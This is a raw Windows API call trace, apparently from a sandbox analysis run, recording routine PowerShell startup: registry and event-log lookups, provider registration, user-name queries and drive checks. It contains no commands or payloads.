	[0415.641] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x0) returned 0x2
	[0415.641] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x368) returned 0x0
	[0415.641] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x0) returned 0x2
	[0415.641] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x36c) returned 0x0
	[0415.641] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x0) returned 0x2
	[0415.641] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x370) returned 0x0
	[0415.641] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x0) returned 0x2
	[0415.641] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x374) returned 0x0
	[0415.641] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x0) returned 0x2
	[0415.641] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x378) returned 0x0
	[0415.642] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x0) returned 0x2
	[0415.642] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x37c) returned 0x0
	[0415.642] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x0) returned 0x2
	[0415.642] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x380) returned 0x0
	[0415.642] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x0) returned 0x2
	[0415.642] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x384) returned 0x0
	[0415.642] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x388) returned 0x0
	[0415.642] RegCloseKey (hKey=0x388) returned 0x0
	[0415.643] RegCloseKey (hKey=0x364) returned 0x0
	[0415.643] RegCloseKey (hKey=0x384) returned 0x0
	[0415.650] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1bb00008
	[0415.951] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f75358*="WSMan", lpRawData=0x2f750c8) returned 1
	[0415.958] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0415.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.958] CoTaskMemFree (pv=0x1b91c710) 
	[0415.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.961] CoTaskMemAlloc (cb=0x804) returned 0x1b92ffd0
	[0415.961] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92ffd0, nSize=0x20d5e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5e8) returned 0x1
	[0415.961] CoTaskMemFree (pv=0x1b92ffd0) 
	[0415.961] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.961] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d628 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d628) returned 1
	[0415.962] CoTaskMemFree (pv=0x33c760) 
	[0415.962] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f7ad38*="Alias", lpRawData=0x2f7aac8) returned 1
	[0415.969] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0415.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.969] CoTaskMemFree (pv=0x1b91c710) 
	[0415.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0415.971] CoTaskMemAlloc (cb=0x804) returned 0x1b92ffd0
	[0415.971] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92ffd0, nSize=0x20d5e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5e8) returned 0x1
	[0415.972] CoTaskMemFree (pv=0x1b92ffd0) 
	[0415.972] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.972] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d628 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d628) returned 1
	[0415.972] CoTaskMemFree (pv=0x33c760) 
	[0415.973] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f80330*="Environment", lpRawData=0x2f800c0) returned 1
	[0415.987] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0415.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.987] CoTaskMemFree (pv=0x1b91c710) 
	[0415.988] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0415.988] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0415.988] CoTaskMemFree (pv=0x1b91c710) 
	[0415.988] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0415.988] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0415.988] CoTaskMemFree (pv=0x1b91c710) 
	[0415.988] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0415.989] SetErrorMode (uMode=0x1) returned 0x1
	[0415.989] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x20d3a0 | out: lpFileInformation=0x20d3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.989] SetErrorMode (uMode=0x1) returned 0x1
	[0415.989] GetLogicalDrives () returned 0x4
	[0415.990] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.990] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0415.990] SetErrorMode (uMode=0x1) returned 0x1
	[0415.991] CoTaskMemAlloc (cb=0x68) returned 0x3bb190
	[0415.991] CoTaskMemAlloc (cb=0x68) returned 0x3bb120
	[0415.991] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3bb190, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x20d370, lpMaximumComponentLength=0x20d36c, lpFileSystemFlags=0x20d368, lpFileSystemNameBuffer=0x3bb120, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20d370*=0x9c354b42, lpMaximumComponentLength=0x20d36c*=0xff, lpFileSystemFlags=0x20d368*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0415.991] CoTaskMemFree (pv=0x3bb190) 
	[0415.991] CoTaskMemFree (pv=0x3bb120) 
	[0415.991] SetErrorMode (uMode=0x1) returned 0x1
	[0415.991] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0415.992] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.992] SetErrorMode (uMode=0x1) returned 0x1
	[0415.992] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d310 | out: lpFileInformation=0x20d310*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.992] SetErrorMode (uMode=0x1) returned 0x1
	[0415.992] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.992] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0415.993] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20ce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0415.994] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.994] SetErrorMode (uMode=0x1) returned 0x1
	[0415.994] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d140 | out: lpFileInformation=0x20d140*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.994] SetErrorMode (uMode=0x1) returned 0x1
	[0415.994] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.994] SetErrorMode (uMode=0x1) returned 0x1
	[0415.994] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d140 | out: lpFileInformation=0x20d140*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.995] SetErrorMode (uMode=0x1) returned 0x1
	[0415.995] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.995] SetErrorMode (uMode=0x1) returned 0x1
	[0415.995] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d1e0 | out: lpFileInformation=0x20d1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.995] SetErrorMode (uMode=0x1) returned 0x1
	[0415.996] CoTaskMemAlloc (cb=0x804) returned 0x1b92ffd0
	[0415.996] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92ffd0, nSize=0x20d5e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5e8) returned 0x1
	[0415.996] CoTaskMemFree (pv=0x1b92ffd0) 
	[0415.996] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.996] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d628 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d628) returned 1
	[0415.996] CoTaskMemFree (pv=0x33c760) 
	[0415.997] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f87420*="FileSystem", lpRawData=0x2f871b0) returned 1
	[0416.003] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0416.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.003] CoTaskMemFree (pv=0x1b91c710) 
	[0416.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.005] CoTaskMemAlloc (cb=0x804) returned 0x1b92ffd0
	[0416.005] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92ffd0, nSize=0x20d5e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5e8) returned 0x1
	[0416.005] CoTaskMemFree (pv=0x1b92ffd0) 
	[0416.006] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0416.006] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d628 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d628) returned 1
	[0416.006] CoTaskMemFree (pv=0x33c760) 
	[0416.006] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8cc60*="Function", lpRawData=0x2f8c9f0) returned 1
	[0416.027] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0416.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.027] CoTaskMemFree (pv=0x1b91c710) 
	[0416.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.420] CoTaskMemAlloc (cb=0x804) returned 0x1b92ffd0
	[0416.421] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92ffd0, nSize=0x20d5e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5e8) returned 0x1
	[0416.421] CoTaskMemFree (pv=0x1b92ffd0) 
	[0416.421] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0416.421] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d628 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d628) returned 1
	[0416.422] CoTaskMemFree (pv=0x33c760) 
	[0416.422] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2faf488*="Registry", lpRawData=0x2faf218) returned 1
	[0416.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.510] CoTaskMemAlloc (cb=0x804) returned 0x1b92ffd0
	[0416.510] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92ffd0, nSize=0x20d5e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5e8) returned 0x1
	[0416.510] CoTaskMemFree (pv=0x1b92ffd0) 
	[0416.510] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0416.510] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d628 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d628) returned 1
	[0416.511] CoTaskMemFree (pv=0x33c760) 
	[0416.511] ReportEventW (hEventLog=0x1bb00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fb48a0*="Variable", lpRawData=0x2fb4630) returned 1
	[0416.513] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0416.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.513] CoTaskMemFree (pv=0x1b91c710) 
	[0416.516] CoTaskMemAlloc (cb=0x104) returned 0x1b91c710
	[0416.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.516] CoTaskMemFree (pv=0x1b91c710) 
	[0416.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0416.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0416.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0416.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0416.844] CoTaskMemAlloc (cb=0x804) returned 0x1b939a40
	[0416.844] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b939a40, nSize=0x20d5e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5e8) returned 0x1
	[0416.845] CoTaskMemFree (pv=0x1b939a40) 
	[0416.845] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0416.845] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d628 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d628) returned 1
